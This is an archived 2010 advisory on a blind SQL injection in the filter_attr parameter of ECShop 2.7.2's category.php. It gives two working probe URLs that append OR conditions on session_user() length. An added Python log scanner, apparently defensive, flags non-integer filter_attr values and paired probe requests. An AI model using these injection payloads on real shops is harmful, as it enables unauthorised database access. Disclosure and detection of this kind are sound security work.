TUCoPS :: HP Unsorted E :: bt-30106.htm

ECShop apps injection
Injection of ECShop apps.

ECShop is one of the most popular shopping applications in China.
 
The latest version of ECShop is V2.7.2. It has a numeric-context SQL injection (OR_NUM type) in the filter_attr parameter of category.php: the value is used in a numeric position in the query, so a condition can be appended with OR.
 
For example:
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 

Test it: the two requests below differ only in the compared length (14 versus 15); when the returned page differs between them, the condition is being evaluated by the database, which confirms the blind injection.
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 
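As an added example (not part of the original advisory), a small Python log check that flags category.php requests whose filter_attr is not a plain integer, and consecutive flagged requests from one client with differing response sizes, which is the footprint of the boolean-blind probe shown above. The log lines are constructed, and the integer-only allowlist is an assumption about the legitimate format of filter_attr.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [07/May/2010:10:00:01 +0000] "GET /shop/category.php?page=1&sort=goods_id&category=1&filter_attr=-999 HTTP/1.1" 200 5120
203.0.113.5 - - [07/May/2010:10:00:02 +0000] "GET /shop/category.php?page=1&sort=goods_id&category=1&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 HTTP/1.1" 200 5120
203.0.113.5 - - [07/May/2010:10:00:03 +0000] "GET /shop/category.php?page=1&sort=goods_id&category=1&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 HTTP/1.1" 200 4870
198.51.100.7 - - [07/May/2010:10:00:04 +0000] "GET /shop/goods.php?id=12 HTTP/1.1" 200 3000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)'
)
# Allowlist (assumption): a legitimate filter_attr is a single, possibly negative, integer.
NUMERIC_RE = re.compile(r'^-?\d+$')


def is_suspicious_filter_attr(value):
    """True when the (already percent-decoded) value is not a plain integer."""
    return NUMERIC_RE.fullmatch(value) is None


def scan_log(text):
    """Return one record per category.php request whose filter_attr fails the allowlist."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.endswith('/category.php'):
            continue
        # parse_qs percent-decodes, so "%20OR%20" is seen as " OR ".
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get('filter_attr', []):
            if is_suspicious_filter_attr(value):
                hits.append({'ip': m['ip'], 'ts': m['ts'],
                             'filter_attr': value, 'size': int(m['size'])})
    return hits


def blind_probe_pairs(hits):
    """Consecutive flagged requests from one client with different response sizes:
    the true and false branches of a boolean-blind probe render different pages."""
    pairs, last_by_ip = [], {}
    for h in hits:
        prev = last_by_ip.get(h['ip'])
        if prev is not None and prev['size'] != h['size']:
            pairs.append((prev, h))
        last_by_ip[h['ip']] = h
    return pairs
```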
 
Liscker
2010.05.07
